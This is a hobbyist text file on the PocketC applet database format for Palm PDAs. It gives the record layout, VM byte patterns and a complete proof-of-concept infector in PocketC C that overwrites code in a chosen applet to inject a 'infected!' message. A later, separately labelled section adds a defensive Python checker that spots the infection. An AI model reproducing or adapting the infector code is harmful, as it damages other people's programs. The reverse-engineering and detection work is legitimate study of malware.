hi there!

the following is about palm pdas+pocketc so if you're not interested stop here -->.<--
this is dedicated to all who play around on their palm while waiting for the subway :)

what exactly are you trying to tell us ?
========================================

i wanted to write an infector for pocketc applets..and that's what i found out.

what is PocketC ?
==================

PocketC provides a way to write and compile c code directly on a palm pda.
compilation does not produce independent programs but a kind of applets which
are executed via the pocketc virtual machine (PCvm).
after compilation a database is created which contains 4 records named #0 to #3.

#0 - contains code
#1 - additional stuff (honestly i have no idea)
#2 - static strings, function names
#3 - same as #1

a closer look to #0
===================

at first there is some code which holds some information about the applet (i think).
for example the first 2 bytes hold the size of record #0 minus 2, which limits the
possible size to 0xffff bytes ;). imho this is not that important.
in any case in my examples the first 28 bytes (mostly followed by a NULL) are quite
similar in all applets. next to that are functions followed by function main.
on simple applets the last 9 bytes are mostly the same (or similar).

observation: imho all sub functions end with a 0x2c. could be smth like the well
known int $0x80..dunno.

a closer look to #2
===================

the first 6 bytes are again smth like a header..nothing useful except for the
first 2 bytes which again hold the recordsize-2. at offset 7 the strings start.
right before a string is a byte which contains the strlen of the string, followed
by a NULL. thus the end of the record is a NULL.
extracted code snips
====================

// exits to app launcher
exit()   - "\x28\x70\x2c";

// prints smth from #2
// byte 3 points on the string:
// points on the null byte before a string entry
puts()   - "\x03\x00\x??\x07\x28\x01\x2c";

// launches a proggie named in #2
// works as puts() does..
launch() - "\x03\x00\x??\x07\x28\x58\x2c";

// ret
// i'm not sure about that one. at least it is the end
// of main in simple applets. other func()'s return similar,
// perhaps this one works for them, too
ret      - "\x2b\x2f\x29";

// code to reserve a string variable (at least i think so..)
// 0x?? = size
"\x33\x00\x??\x0c\x03\x00\x00\x2b\x2d\x00\x??";

i do not yet know how more complex functions work so...
this is enough information to write a little infector which injects simple
code into a victim applet. oh by the way this code seems to be pic ;).
all this was done using version 6.0 of pocketc.

POC:
====

// PCinf.c
/*
 this is a simple code infector for pocketc running on palm compatible hardware.
 it injects a string printing code. you can also use the launch() code and exec
 eg. "memo"..
 unpleasant side effects:
 *atm the applet gets "unusable" for its normal purpose :>
 *bigger applets crash due to this buggy "ret" thingie..
 by qobaiashi
*/

#define LOCATION 0x1d

main()
{
  string name,
         code[11] = {"\x03\x90\x05\x07\x28\x01\x2c\x2b\x2f\x29\x00"},
         msg[12]  = // 1st byte = strlen!
                    {"\x0ainfected!\n\x00"};
  int dbcntr = 0, cntr, record, size, r2size;
  char patch;
  pointer ptr;

  clear();
  puts(" ---PCinf--- \n");
  puts("   PocketC   \n");
  puts("  infector   \n");
  puts(" by qobaiashi\n\n");

  name = gets("Applet to infect:");
  if (strlen(name) == 0)
  {
    puts("[!] i need a victim..\n");
    launch("PktC");
  }
  puts("[*] using applet: "+name+"\n");

  // opening said database
  dbopen(name);

  //---string infector section---\\
  // write a string into #2
  // set record number:
  record = 0;
  dbrec(record);
  dbcntr = dbsize();
  r2size = dbcntr; // for patching..
  puts("using record "+record+"\n");
  puts("record size = "+dbcntr+"\n");
  // set offset in current record
  dbseek(dbcntr);
  puts("location is "+dbpos()+"\n\n");
  size = strlen(msg);
  ptr = msg+size;
  dbwritex(ptr, 'c');
  ptr = msg;
  dbwritex(ptr, 'ssize');

  //---code infector section---\\
  // set record number
  record = 0;
  dbcntr = dbsize();
  puts("using record "+record+"\n");
  puts("record size = "+dbcntr+"\n");
  // set offset in current record
  dbseek(LOCATION);
  puts("location is "+dbpos()+"\n\n");
  // write out hostile code
  ptr = code;
  dbwritex(ptr, 'ssize');
  // patch 0x00 into code
  ptr = code + size;
  dbseek(LOCATION+1);
  dbwritex(ptr, 'c');
  // patch string offset in #2 into code
  dbseek(LOCATION+2);
  patch = r2size;
  dbwritex(&patch, 'c');

  dbclose();
}
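the record layout described in "a closer look to #0 / #2" and the byte patterns under "extracted code snips" are enough to write a small offline checker for a PCvm database, which is what a defender wants here: a way to tell whether the size word still matches the record, which strings the string table really holds, and which of the known call patterns show up in the code record. what follows is an added example, not qobaiashi's code and not part of the original text. it assumes the size word is big-endian (68k palm), that entries in #2 are [len][chars][NUL] after the 6-byte header with a lone NUL closing the table, and that the wildcard byte in the puts()/launch() pattern is the offset of the NUL before an entry (so the length byte is one past it). the record bytes are constructed by hand from the description, not dumped from a real applet.

```python
# added example, not part of the original text: an offline sanity checker for
# the PCvm record layout described above. all layout knowledge is taken from
# that description; the sample records are constructed, not real dumps, and
# the big-endian size word is an assumption.
import re
from typing import Dict, List, Optional, Tuple

# byte patterns from the "extracted code snips" section; the capture group is
# the wildcard byte that puts()/launch() use as an offset into record #2.
# DOTALL so the wildcard also matches 0x0a.
SIGNATURES = {
    "exit":   re.compile(rb"\x28\x70\x2c", re.DOTALL),
    "puts":   re.compile(rb"\x03\x00(.)\x07\x28\x01\x2c", re.DOTALL),
    "launch": re.compile(rb"\x03\x00(.)\x07\x28\x58\x2c", re.DOTALL),
    "ret":    re.compile(rb"\x2b\x2f\x29", re.DOTALL),
}
HEADER2_LEN = 6   # header length of record #2 as stated in the text


def header_size_ok(record: bytes) -> bool:
    """The first two bytes of #0 and #2 hold (record size - 2).
    A record that grew without this word being patched fails the check,
    which is exactly what appending bytes at dbsize() leaves behind."""
    return len(record) >= 2 and int.from_bytes(record[:2], "big") == len(record) - 2


def parse_strings(record2: bytes) -> Dict[int, str]:
    """Walk the string table of #2: entries of [len][chars][NUL] after the
    header; a lone NUL ends the table. Keys are offsets of the length bytes."""
    entries: Dict[int, str] = {}
    pos = HEADER2_LEN
    while pos < len(record2):
        n = record2[pos]
        if n == 0:                       # closing NUL of the table
            break
        chars = record2[pos + 1:pos + 1 + n]
        if len(chars) != n or record2[pos + 1 + n:pos + 2 + n] != b"\x00":
            raise ValueError("truncated or unterminated entry at offset %d" % pos)
        entries[pos] = chars.decode("latin-1")
        pos += n + 2
    return entries


def resolve_calls(record0: bytes, record2: bytes) -> List[Tuple[str, Optional[str]]]:
    """Find the known call patterns in #0 in code order. For puts()/launch()
    the wildcard byte is read as the offset of the NUL *before* an entry
    (assumption taken from the text), so the length byte sits one past it."""
    strings = parse_strings(record2)
    hits = []
    for name, pat in SIGNATURES.items():
        for m in pat.finditer(record0):
            target = None
            if m.groups():
                target = strings.get(m.group(1)[0] + 1)
            hits.append((m.start(), name, target))
    hits.sort()
    return [(name, target) for _, name, target in hits]


def with_size(body: bytes) -> bytes:
    """Prepend the size word: (2 + len(body)) - 2 == len(body)."""
    return len(body).to_bytes(2, "big") + body


def build_samples() -> Tuple[bytes, bytes, bytes]:
    """Constructed records, not real applet dumps. Returns a #0, a matching
    #2, and a copy of #2 with a string appended after its closing NUL while
    the size word was left stale."""
    record2 = with_size(b"\x00\x00\x00\x00"      # rest of the 6-byte header
                        + b"\x05hello\x00"       # entry at offset 6
                        + b"\x04main\x00"        # entry at offset 13
                        + b"\x00")               # end of table
    record0 = with_size(b"\x00" * 26                        # pad to the 28-byte preamble
                        + b"\x03\x00\x0c\x07\x28\x01\x2c"   # puts(): 0x0c -> NUL before "main"
                        + b"\x28\x70\x2c"                   # exit()
                        + b"\x2b\x2f\x29")                  # ret
    stale = record2 + b"\x0ainfected!\n\x00"
    return record0, record2, stale


if __name__ == "__main__":
    r0, r2, r2_stale = build_samples()
    print("size word ok: #0=%s #2=%s stale #2=%s"
          % (header_size_ok(r0), header_size_ok(r2), header_size_ok(r2_stale)))
    for name, arg in resolve_calls(r0, r2):
        print("%s(%r)" % (name, arg) if arg is not None else "%s()" % name)
```

the stale size word is the cheap tell: the POC seeks to dbsize() and writes past the end of the record without touching the first two bytes, so header_size_ok() flips to false on the grown record, while parse_strings() never even reaches the appended entry because the old closing NUL is still in place. on a real database the two records would be read out of the .pdb instead of built by hand.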